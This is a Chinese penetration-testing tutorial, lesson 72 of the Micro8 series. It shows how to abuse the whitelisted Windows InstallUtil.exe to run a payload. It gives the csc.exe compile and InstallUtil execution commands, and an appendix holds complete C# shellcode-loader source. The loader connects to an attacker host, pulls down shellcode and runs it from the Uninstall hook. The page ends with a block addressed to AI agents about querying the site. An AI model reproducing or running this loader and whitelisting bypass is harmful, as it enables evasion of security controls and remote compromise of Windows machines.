# 第七十二课:基于白名单Installutil.exe执行payload第二季 ## Installutil简介: Installer工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源。此工具与System.Configuration.Install命名空间中的类一起使用。 具体参考:Windows Installer部署 ) **说明:**Installutil.exe所在路径没有被系统添加PATH环境变量中,因此,Installutil命令无法识别。 基于白名单installutil.exe配置payload: Windows 7 默认位置: ```bash C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe ``` **攻击机:**192.168.1.4 Debian\ **靶机:**192.168.1.3 Windows 7 ## 配置攻击机msf: ![](/files/-LZPDdSq52H3PBTaLn_S) ## 靶机执行: ## 靶机编译: ```bash C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.Ente rpriseServices.dll /r:System.IO.Compression.dll /target:library /out:Mic opoor.exe /keyfile:C:\Users\John\Desktop\installutil.snk /unsafe C:\Users\John\Desktop\installutil.cs ``` ![](/files/-LZPDdSu4hQAC8g6TJj3) **payload:**\ Micropoor.exe\ ![](/files/-LZPDdSxc58ZTE6DzqOB) **靶机执行:** ```bash C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U Micropoor.exe ``` ![](/files/-LZPDdT-dCO3gh9bduND) ## 附录:Micropoor.cs **注:x64 payload** ```csharp using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms; public class GQLBigHgUniLuVx { public static void Main() { while(true) {{ MessageBox.Show("doge"); Console.ReadLine();}} } } [System.ComponentModel.RunInstaller(true)] public class esxWUYUTWShqW : System.Configuration.Install.Installer { public override void Uninstall(System.Collections.IDictionary zWrdFAUHmunnu) { jkmhGrfzsKQeCG.LCIUtRN(); } } public class jkmhGrfzsKQeCG { [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 YUtHhF,UInt32 VenifEUR, UInt32 NIHbxnOmrgiBGL, UInt32 KIheHEUxhAfOI); [DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 GDmElasSZbx, UInt32 rGECFEZG, UInt32 UyBSrAIp,IntPtr sPEeJlufmodo, UInt32 jmzHRQU, ref UInt32 SnpQPGMvDbMOGmn); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr pRIwbzTTS, UInt32 eRLAWWYQnq); static byte[] ErlgHH(string ZwznjBJY, int KsMEeo) { IPEndPoint qAmSXHOKCbGlysd = new IPEndPoint(IPAddress.Parse(ZwznjBJY), KsMEeo); Socket XXxIoIXNCle = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); try { XXxIoIXNCle.Connect(qAmSXHOKCbGlysd); } catch { return null;} byte[] UmquAHRnhhpuE = new byte[4]; XXxIoIXNCle.Receive(UmquAHRnhhpuE, 4, 0); int kFVRSNnpj = BitConverter.ToInt32(UmquAHRnhhpuE, 0); byte[] qaYyFq = new byte[kFVRSNnpj + 5]; int SRCDELibA = 0; while (SRCDELibA < kFVRSNnpj) { SRCDELibA += XXxIoIXNCle.Receive(qaYyFq, SRCDELibA + 5, (kFVRSNnpj ‐ SRCDELibA) < 4096 ? (kFVRSNnpj ‐ SRCDELibA) : 4096, 0);} byte[] TvvzOgPLqwcFFv = BitConverter.GetBytes((int)XXxIoIXNCle.Handle); Array.Copy(TvvzOgPLqwcFFv, 0, qaYyFq, 1, 4); qaYyFq[0] = 0xBF; return qaYyFq;} static void cmMtjerv(byte[] HEHUjJhkrNS) { if (HEHUjJhkrNS != null) { UInt32 WcpKfU = VirtualAlloc(0, (UInt32)HEHUjJhkrNS.Length, 0x1000, 0x40); Marshal.Copy(HEHUjJhkrNS, 0, (IntPtr)(WcpKfU), HEHUjJhkrNS.Length); IntPtr UhxtIFnlOQatrk = IntPtr.Zero; UInt32 wdjYKFDCCf = 0; IntPtr XVYcQxpp = IntPtr.Zero; UhxtIFnlOQatrk = CreateThread(0, 0, WcpKfU, XVYcQxpp, 0, ref wdjYKFDCCf); WaitForSingleObject(UhxtIFnlOQatrk, 0xFFFFFFFF); }} public static void LCIUtRN() { byte[] IBtCWU = null; IBtCWU = ErlgHH("192.168.1.4", 53); cmMtjerv(IBtCWU); } } ``` > installutil.snk 596B > > Micropoor --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://micro8.gitbook.io/micro8/contents-1/71-80/72-ji-yu-bai-ming-dan-installutil.exe-zhi-hang-payload-di-er-ji.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.